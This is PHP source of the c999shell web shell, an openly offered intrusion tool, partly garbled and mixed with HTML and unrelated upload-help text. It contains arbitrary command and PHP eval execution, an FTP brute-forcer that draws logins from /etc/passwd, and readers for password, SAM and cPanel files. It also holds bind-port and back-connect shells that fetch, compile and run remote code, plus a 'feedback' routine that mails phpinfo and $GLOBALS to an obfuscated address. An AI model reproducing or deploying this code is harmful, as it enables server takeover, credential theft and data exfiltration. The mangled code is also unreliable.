@ini_set(“highlight.html”,$highlight_html); #000000 @ini_set(“highlight.keyword”,$highlight_keyword); #007700 @ini_set(“highlight.string”,$highlight_string); //#DD0000 if (!is_array($actbox)) {$actbox = array();} $dspact = $act = htmlspecialchars($act); $disp_fullpath = $ls_arr = $notls = null; $ud = urlencode($d); ?>
!c999Shell v. ! | |
|---|---|
Software: uname -a: ",1); ?> ",1);} else {echo get_current_user();} ?> Safe-mode: ".htmlspecialchars($b).DIRECTORY_SEPARATOR."";
$i++;
}
echo " ";
if (is_writable($d))
{
$wd = TRUE;
$wdt = "[ ok ]";
echo "".view_perms(fileperms($d))."";
}
else
{
$wd = FALSE;
$wdt = "[ Read-Only ]";
echo "".view_perms_color($d)."";
}
if (is_callable("disk_free_space"))
{
$free = disk_free_space($d);
$total = disk_total_space($d);
if ($free === FALSE) {$free = 0;}
if ($total === FALSE) {$total = 0;}
if ($free < 0) {$free = 0;}
if ($total < 0) {$total = 0;}
$used = $total-$free;
$free_percent = round(100/($total/$free),2);
echo " | |
"; if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "
| ".$donated_html." |
";} echo "
";
if ($act == "") {$act = $dspact = "ls";}
if ($act == "sql")
{
$sql_surl = $surl."act=sql";
if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
$sql_surl .= "&";
?>Attention! SQL-Manager is NOT ready module! Don't reports bugs.
"; } $act = $dspact = "ls"; } if ($act == "ftpquickbrute") { echo "Ftp Quick brute: "; if (!win) {echo "This functions not work in Windows! ";} else { function c999ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) { if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));} else {$TRUE = TRUE;} if ($TRUE) { $sock = @ftp_connect($host,$port,$timeout); if (@ftp_login($sock,$login,$pass)) { echo "Connected to ".$host." with login \"".$login."\" and password \"".$pass."\". "; ob_flush(); return TRUE; } } } if (!empty($submit)) { if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} $fp = fopen("/etc/passwd","r"); if (!$fp) {echo "Can't get /etc/passwd for password-list.";} else { if ($fqb_logging) { if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} else {$fqb_logfp = FALSE;} $fqb_log = "FTP Quick Brute (called c999shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} } ob_flush(); $i = $success = 0; $ftpquick_st = getmicrotime(); while(!feof($fp)) { $str = explode(":",fgets($fp,2048)); if (c999ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) { echo "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\" "; $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} $success++; ob_flush(); } if ($i > $fqb_lenght) {break;} $i++; } if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";} $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); echo " Done! Total time (secs.): ".$ftpquick_t." Total connections: ".$i." Success.: ".$success." Unsuccess.:".($i-$success)." Connects per second: ".round($i/$ftpquick_t,2)." "; $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} if ($fqb_logemail) {@mail($fqb_logemail,"c999shell v. ".$shver." report",$fqb_log);} fclose($fqb_logfp); } } else { $logfile = $tmpdir_logs."c999sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); echo ""; } } } if ($act == "d") { if (!is_dir($d)) {echo "
"; } } if ($act == "phpinfo") {@ob_clean(); phpinfo(); c999shexit();} if ($act == "security") { echo " "; if (!$win) { if ($nixpasswd) { if ($nixpasswd == 1) {$nixpasswd = 0;} echo "*nix /etc/passwd: "; if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} echo " "; $i = $nixpwd_s; while ($i < $nixpwd_e) { $uid = posix_getpwuid($i); if ($uid) { $uid["dir"] = "".$uid["dir"].""; echo join(":",$uid)." "; } $i++; } } else {echo " Get /etc/passwd ";} } else { $v = $_SERVER["WINDIR"]."\repair\sam"; if (file_get_contents($v)) {echo "You can't crack winnt passwords(".$v.") ";} else {echo "You can crack winnt passwords. Download, and use lcp.crack+ ©. ";} } if (file_get_contents("/etc/userdomains")) {echo "View cpanel user-domains logs ";} if (file_get_contents("/var/cpanel/accounting.log")) {echo "View cpanel logs ";} if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "Apache configuration (httpd.conf) ";} if (file_get_contents("/etc/httpd.conf")) {echo "Apache configuration (httpd.conf) ";} if (file_get_contents("/etc/syslog.conf")) {echo "Syslog configuration (syslog.conf) ";} if (file_get_contents("/etc/motd")) {echo "Message Of The Day ";} if (file_get_contents("/etc/hosts")) {echo "Hosts ";} function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "".$name." - ";} echo $name.nl2br($value)." ";}} displaysecinfo("OS Version?",myshellexec("cat /proc/version")); displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version")); displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net")); displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise")); displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo")); displaysecinfo("RAM",myshellexec("free -m")); displaysecinfo("HDD space",myshellexec("df -h")); displaysecinfo("List of Attributes",myshellexec("lsattr -a")); displaysecinfo("Mount options ",myshellexec("cat /etc/fstab")); displaysecinfo("Is cURL installed?",myshellexec("which curl")); displaysecinfo("Is lynx installed?",myshellexec("which lynx")); displaysecinfo("Is links installed?",myshellexec("which links")); displaysecinfo("Is fetch installed?",myshellexec("which fetch")); displaysecinfo("Is GET installed?",myshellexec("which GET")); displaysecinfo("Is perl installed?",myshellexec("which perl")); displaysecinfo("Where is apache",myshellexec("whereis apache")); displaysecinfo("Where is perl?",myshellexec("whereis perl")); displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf")); displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf")); displaysecinfo("locate my.conf",myshellexec("locate my.conf")); displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf")); } if ($act == "mkfile") { if ($mkfile != $d) { if (file_exists($mkfile)) {echo "Make File \"".htmlspecialchars($mkfile)."\": object alredy exists";} elseif (!fopen($mkfile,"w")) {echo "Make File \"".htmlspecialchars($mkfile)."\": access denied";} else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} } else {$act = $dspact = "ls";} } if ($act == "encoder") { echo " "; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";} } if ($act == "selfremove") { if (($submit == $rndcode) and ($submit != "")) { if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c999shell v.".$shver."!"; c999shexit(); } else {echo " ";}} if ($act == "feedback") { $suppmail = base64_decode("Yzk5c2hlbGxAY2N0ZWFtLnJ1"); if (!empty($submit)) { $ticket = substr(md5(microtime()+rand(1,1000)),0,6); $body = "c999shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR; if (!empty($fdbk_ref)) { $tmp = @ob_get_contents(); ob_clean(); phpinfo(); $phpinfo = base64_encode(ob_get_contents()); ob_clean(); echo $tmp; $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n"; } mail($suppmail,"c999shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail); echo " "; if (empty($search_in)) {$search_in = $d;} if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} if (empty($search_text_wwo)) {$search_text_regexp = 0;} if (!empty($submit)) { $found = array(); $found_d = 0; $found_f = 0; $search_i_f = 0; $search_i_d = 0; $a = array ( "name"=>$search_name, "name_regexp"=>$search_name_regexp, "text"=>$search_text, "text_regexp"=>$search_text_regxp, "text_wwo"=>$search_text_wwo, "text_cs"=>$search_text_cs, "text_not"=>$search_text_not ); $searchtime = getmicrotime(); $in = array_unique(explode(";",$search_in)); foreach($in as $v) {c999fsearch($v);} $searchtime = round(getmicrotime()-$searchtime,4); if (count($found) == 0) {echo "No files found!";} else { $ls_arr = $found; $disp_fullpath = TRUE; $act = "ls"; } } echo ""; if ($act == "ls") {$dspact = $act; echo " Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second). ";} } if ($act == "chmod") { $mode = fileperms($d.$f); if (!$mode) {echo "Change file-mode with error: can't get current value.";} else { $form = TRUE; if ($chmod_submit) { $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";} else {$err = "Can't chmod to ".$octet.".";} } if ($form) { $perms = parse_perms($mode); echo "Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).") ".($err?"Error: ".$err:"").""; } } } if ($act == "upload") { $uploadmess = ""; $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); if (empty($uploadpath)) {$uploadpath = $d;} elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} if (!empty($submit)) { global $HTTP_POST_FILES; $uploadfile = $HTTP_POST_FILES["uploadfile"]; if (!empty($uploadfile["tmp_name"])) { if (empty($uploadfilename)) {$destin = $uploadfile["name"];} else {$destin = $userfilename;} if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"! ";} } elseif (!empty($uploadurl)) { if (!empty($uploadfilename)) {$destin = $uploadfilename;} else { $destin = explode("/",$destin); $destin = $destin[count($destin)-1]; if (empty($destin)) { $i = 0; $b = ""; while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} } if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "Incorect url! ";} else { $st = getmicrotime(); $content = @file_get_contents($uploadurl); $dt = round(getmicrotime()-$st,4); if (!$content) {$uploadmess .= "Can't download file! ";} else { if ($filestealth) {$stat = stat($uploadpath.$destin);} $fp = fopen($uploadpath.$destin,"w"); if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."! ";} else { fwrite($fp,$content,strlen($content)); fclose($fp); if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} } } } } } if ($miniform) { echo "".$uploadmess.""; $act = "ls"; } else { echo "File upload: ".$uploadmess.""; } } if ($act == "delete") { $delerr = ""; foreach ($actbox as $v) { $result = FALSE; $result = fs_rmobj($v); if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)." ";} } if (!empty($delerr)) {echo "Deleting with errors: ".$delerr;} $act = "ls"; } if (!$usefsbuff) { if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo " ";} if ($copy_unset) {unset($sess_data["copy"][$k]);} } foreach($sess_data["cut"] as $k=>$v) { $to = $d.basename($v); if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."! ";} unset($sess_data["cut"][$k]); } c999_sess_put($sess_data); if (!empty($psterr)) {echo "Pasting with errors: ".$psterr;} $act = "ls"; } elseif ($actarcbuff) { $arcerr = ""; if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} else {$ext = ".tar.gz";} if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} $cmdline .= " ".$actarcbuff_path; $objects = array_merge($sess_data["copy"],$sess_data["cut"]); foreach($objects as $v) { $v = str_replace("\\",DIRECTORY_SEPARATOR,$v); if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} if (is_dir($v)) { if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} $v .= "*"; } $cmdline .= " ".$v; } $tmp = realpath("."); chdir($d); $ret = myshellexec($cmdline); chdir($tmp); if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")! ";} $ret = str_replace("\r\n","\n",$ret); $ret = explode("\n",$ret); if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} foreach($sess_data["cut"] as $k=>$v) { if (in_array($v,$ret)) {fs_rmobj($v);} unset($sess_data["cut"][$k]); } c999_sess_put($sess_data); if (!empty($arcerr)) {echo "Archivation errors: ".$arcerr;} $act = "ls"; } elseif ($actpastebuff) { $psterr = ""; foreach($sess_data["copy"] as $k=>$v) { $to = $d.basename($v); if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."! ";} if ($copy_unset) {unset($sess_data["copy"][$k]);} } foreach($sess_data["cut"] as $k=>$v) { $to = $d.basename($v); if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."! ";} unset($sess_data["cut"][$k]); } c999_sess_put($sess_data); if (!empty($psterr)) {echo "Pasting with errors: ".$psterr;} $act = "ls"; } } if ($act == "cmd") { if (trim($cmd) == "ps -aux") {$act = "processes";} elseif (trim($cmd) == "tasklist") {$act = "processes";} else { @chdir($chdir); if (!empty($submit)) { echo "Result of execution this command: "; $olddir = realpath("."); @chdir($d); $ret = myshellexec($cmd); $ret = convert_cyr_string($ret,"d","w"); if ($cmd_txt) { $rows = count(explode("\r\n",$ret))+1; if ($rows < 10) {$rows = 10;} echo " "; } else {echo $ret." ";} @chdir($olddir); } else {echo "Execution command"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}} echo ""; } } if ($act == "ls") { if (count($ls_arr) > 0) {$list = $ls_arr;} else { $list = array(); if ($h = @opendir($d)) { while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;} closedir($h); } else {} } if (count($list) == 0) {echo "
"; $v = $bndportsrcs[$bind["src"]]; if (empty($v)) {echo "Unknown file! ";} elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other! ";} else { $w = explode(".",$bind["src"]); $ext = $w[count($w)-1]; unset($w[count($w)-1]); $srcpath = join(".",$w).".".rand(0,999).".".$ext; $binpath = $tmpdir.join(".",$w).rand(0,999); if ($ext == "pl") {$binpath = $srcpath;} @unlink($srcpath); $fp = fopen($srcpath,"ab+"); if (!$fp) {echo "Can't write sources to \"".$srcpath."\"! ";} elseif (!$data = c999getsource($bind["src"])) {echo "Can't download sources!";} else { fwrite($fp,$data,strlen($data)); fclose($fp); if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} $v[1] = str_replace("%path",$binpath,$v[1]); $v[1] = str_replace("%port",$bind["port"],$v[1]); $v[1] = str_replace("%pass",$bind["pass"],$v[1]); $v[1] = str_replace("//","/",$v[1]); $retbind = myshellexec($v[1]." > /dev/null &"); sleep(5); $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5); if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";} else {echo "Binding... ok! Connect to ".getenv("SERVER_ADDR").":".$bind["port"]."! You should use NetCat©, run \"nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."\"! "; } } if (!empty($bcsubmit)) { echo "Result of back connection: "; $v = $bcsrcs[$bc["src"]]; if (empty($v)) {echo "Unknown file! ";} else { $w = explode(".",$bc["src"]); $ext = $w[count($w)-1]; unset($w[count($w)-1]); $srcpath = join(".",$w).".".rand(0,999).".".$ext; $binpath = $tmpdir.join(".",$w).rand(0,999); if ($ext == "pl") {$binpath = $srcpath;} @unlink($srcpath); $fp = fopen($srcpath,"ab+"); if (!$fp) {echo "Can't write sources to \"".$srcpath."\"! ";} elseif (!$data = c999getsource($bc["src"])) {echo "Can't download sources!";} else { fwrite($fp,$data,strlen($data)); fclose($fp); if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} $v[1] = str_replace("%path",$binpath,$v[1]); $v[1] = str_replace("%host",$bc["host"],$v[1]); $v[1] = str_replace("%port",$bc["port"],$v[1]); $v[1] = str_replace("//","/",$v[1]); $retbind = myshellexec($v[1]." > /dev/null &"); echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."... "; } } } if (!empty($dpsubmit)) { echo "Result of datapipe-running: "; $v = $dpsrcs[$datapipe["src"]]; if (empty($v)) {echo "Unknown file! ";} elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other! ";} else { $srcpath = $tmpdir.$datapipe["src"]; $w = explode(".",$datapipe["src"]); $ext = $w[count($w)-1]; unset($w[count($w)-1]); $srcpath = join(".",$w).".".rand(0,999).".".$ext; $binpath = $tmpdir.join(".",$w).rand(0,999); if ($ext == "pl") {$binpath = $srcpath;} @unlink($srcpath); $fp = fopen($srcpath,"ab+"); if (!$fp) {echo "Can't write sources to \"".$srcpath."\"! ";} elseif (!$data = c999getsource($datapipe["src"])) {echo "Can't download sources!";} else { fwrite($fp,$data,strlen($data)); fclose($fp); if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]); $v[1] = str_replace("%path",$binpath,$v[1]); $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]); $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]); $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]); $v[1] = str_replace("//","/",$v[1]); $retbind = myshellexec($v[1]." > /dev/null &"); sleep(5); $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5); if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";} else {echo "Running datapipe... ok! Connect to ".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."! You should use NetCat©, run \"nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."\"! "; } } ?>Binding port: Back connection: Click "Connect" only after open port for it. You should use NetCat©, run "nc -l -n -v -p "! Datapipe: Note: sources will be downloaded from remote server.Processes: "; if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");} else {$handler = "tasklist";} $ret = myshellexec($handler); if (!$ret) {echo "Can't execute \"".$handler."\"!";} else { if (empty($processes_sort)) {$processes_sort = $sort_default;} $parsesort = parsesort($processes_sort); if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} $k = $parsesort[0]; if ($parsesort[1] != "a") {$y = "
"; $tmp = ob_get_contents(); $olddir = realpath("."); @chdir($d); if ($tmp) { ob_clean(); eval($eval); $ret = ob_get_contents(); $ret = convert_cyr_string($ret,"d","w"); ob_clean(); echo $tmp; if ($eval_txt) { $rows = count(explode("\r\n",$ret))+1; if ($rows < 10) {$rows = 10;} echo " "; } else {echo $ret." ";} } else { if ($eval_txt) { echo " "; } else {echo $ret;} } @chdir($olddir); } else {echo "Execution PHP-code"; if (empty($eval_txt)) {$eval_txt = TRUE;}} echo ""; } if ($act == "f") { if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") { if (file_exists($d.$f)) {echo " Create Select action/file-type: "; foreach($arr as $t) { if ($t[1] == $rft) {echo " ".$t[0]."";} elseif ($t[1] == $ft) {echo " ".$t[0]."";} else {echo " ".$t[0]."";} echo " (+) |"; } echo " "; if ($ft == "info") { echo "Information:
"; $fi = fopen($d.$f,"rb"); if ($fi) { if ($fullhexdump) {echo "FULL HEXDUMP"; $str = fread($fi,filesize($d.$f));} else {echo "HEXDUMP PREVIEW"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} $n = 0; $a0 = "00000000 "; $a1 = ""; $a2 = ""; for ($i=0; $i "; $a2 .= " "; } } //if ($a1 != "") {$a0 .= sprintf("%08X",$i)." ";} echo "
"; } $encoded = ""; if ($base64 == 1) { echo "Base64 Encode "; $encoded = base64_encode(file_get_contents($d.$f)); } elseif($base64 == 2) { echo "Base64 Encode + Chunk "; $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); } elseif($base64 == 3) { echo "Base64 Encode + Chunk + Quotes "; $encoded = base64_encode(file_get_contents($d.$f)); $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); } elseif($base64 == 4) { $text = file_get_contents($d.$f); $encoded = base64_decode($text); echo "Base64 Decode"; if (base64_encode($encoded) != $text) {echo " (failed)";} echo " "; } if (!empty($encoded)) { echo " "; } echo "HEXDUMP: Base64: "; } elseif ($ft == "html") { if ($white) {@ob_clean();} echo $r; if ($white) {c999shexit();} } elseif ($ft == "txt") {echo " ".htmlspecialchars($r)."";} elseif ($ft == "ini") {echo " "; var_dump(parse_ini_file($d.$f,TRUE)); echo "";} elseif ($ft == "phpsess") { echo " ";
$v = explode("|",$r);
echo $v[0]."";
}
elseif ($ft == "exe")
{
$ext = explode(".",$f);
$c = count($ext)-1;
$ext = $ext[$c];
$ext = strtolower($ext);
$rft = "";
foreach($exeftypes as $k=>$v)
{
if (in_array($ext,$v)) {$rft = $k; break;}
}
$cmd = str_replace("%f%",$f,$rft);
echo "Execute file:";
}
elseif ($ft == "sdb") {echo ""; var_dump(unserialize(base64_decode($r))); echo "";} elseif ($ft == "code") { if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) { $arr = explode("\n",$r); if (count($arr == 18)) { include($d.$f); echo "phpBB configuration is detected in this file! "; if ($dbms == "mysql4") {$dbms = "mysql";} if ($dbms == "mysql") {echo "Connect to DB ";} else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c999shell. Please, report us for fix.";} echo "Parameters for manual connect: "; $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."' ";} echo " "; } } echo " ";
if (!empty($white)) {@ob_clean();}
highlight_file($d.$f);
if (!empty($white)) {c999shexit();}
echo " ";
}
elseif ($ft == "download")
{
@ob_clean();
header("Content-type: application/octet-stream");
header("Content-length: ".filesize($d.$f));
header("Content-disposition: attachment; filename=\"".$f."\";");
echo $r;
exit;
}
elseif ($ft == "notepad")
{
@ob_clean();
header("Content-type: text/plain");
header("Content-disposition: attachment; filename=\"".$f.".txt\";");
echo($r);
exit;
}
elseif ($ft == "img")
{
$inf = getimagesize($d.$f);
if (!$white)
{
if (empty($imgsize)) {$imgsize = 20;}
$width = $inf[0]/100*$imgsize;
$height = $inf[1]/100*$imgsize;
echo "");}}}} natsort($images); $k = array_keys($images); echo " ";} echo " Idea, leading and coding by tristram[CCTeaM]. Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM]. Thanks all who report bugs. All bugs send to tristram's ICQ #656555 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
|
--[ c999shell v. Modded by Shadow & Preddy | RootShell Security Group | Generation time: ]-- |
<?php chdir($lastdir); c999shexit(); ?>
Preserving Overwritten Remote Files
You can set up remote recycle bin to backup files that you overwrite during upload.
Automating Upload
To automate file upload use scripting command put.
- float)$usec + (float)$sec);}} error_reporting(5); @ignore_user_abort(TRUE); @set_magic_quotes_runtime(0); $win = strtolower(substr(PHP_OS,0,3Back
- $_SERVER[“PHP_AUTH_USER”] != $login) or (md5($_SERVER[“PHP_AUTH_PW”]) != $md5_passBack
- $o = readdir($hBack
- $mode & 0xC000) = 0xC000) {$type = ”s“;}
elseif (($mode & 0x4000) = 0x4000) {$type = ”d“;}
elseif (($mode & 0xA000) = 0xA000) {$type = ”l“;}
elseif (($mode & 0x8000) = 0x8000) {$type = ”-“;}
elseif (($mode & 0x6000) = 0x6000) {$type = ”b“;}
elseif (($mode & 0x2000) = 0x2000) {$type = ”c“;}
elseif (($mode & 0x1000) = 0x1000) {$type = ”p“;}
else {$type = ”?“;}
$owner[”read“] = ($mode & 00400)?”r“:”-“; $owner[”write“] = ($mode & 00200)?”w“:”-“; $owner[”execute“] = ($mode & 00100)?”x“:”-“; $group[”read“] = ($mode & 00040)?”r“:”-“; $group[”write“] = ($mode & 00020)?”w“:”-“; $group[”execute“] = ($mode & 00010)?”x“:”-“; $world[”read“] = ($mode & 00004)?”r“:”-“; $world[”write“] = ($mode & 00002)? ”w“:”-“; $world[”execute“] = ($mode & 00001)?”x“:”-“;
if ($mode & 0x800) {$owner[”execute“] = ($owner[”execute“]
”x“)?”s“:”S“;} if ($mode & 0x400) {$group[”execute“] = ($group[”execute“] ”x“)?”s“:”S“;} if ($mode & 0x200) {$world[”execute“] = ($world[”execute“] ”x“)?”t“:”T“;}return $type.join(”“,$owner).join(”“,$group).join(”“,$world); } } if (!function_exists(”posix_getpwuid“) and !in_array(”posix_getpwuid“,$disablefuncBack
- $mode & 0xC000) = 0xC000) {$t = ”s“;} elseif (($mode & 0x4000) = 0x4000) {$t = ”d“;} elseif (($mode & 0xA000) = 0xA000) {$t = ”l“;} elseif (($mode & 0x8000) = 0x8000) {$t = ”-“;} elseif (($mode & 0x6000) = 0x6000) {$t = ”b“;} elseif (($mode & 0x2000) = 0x2000) {$t = ”c“;} elseif (($mode & 0x1000) === 0x1000) {$t = ”p“;} else {$t = ”?“;} $o[”r“] = ($mode & 00400) > 0; $o[”w“] = ($mode & 00200) > 0; $o[”x“] = ($mode & 00100) > 0; $g[”r“] = ($mode & 00040) > 0; $g[”w“] = ($mode & 00020) > 0; $g[”x“] = ($mode & 00010) > 0; $w[”r“] = ($mode & 00004) > 0; $w[”w“] = ($mode & 00002) > 0; $w[”x“] = ($mode & 00001) > 0; return array(”t“⇒$t,”o“⇒$o,”g“⇒$g,”w“⇒$w); } } if (!function_exists(”parsesort“Back
- $submit) and (!$sql_query_result) and ($sql_confirmBack
- !$submit) or ($sql_actBack
- $f = readdir($hBack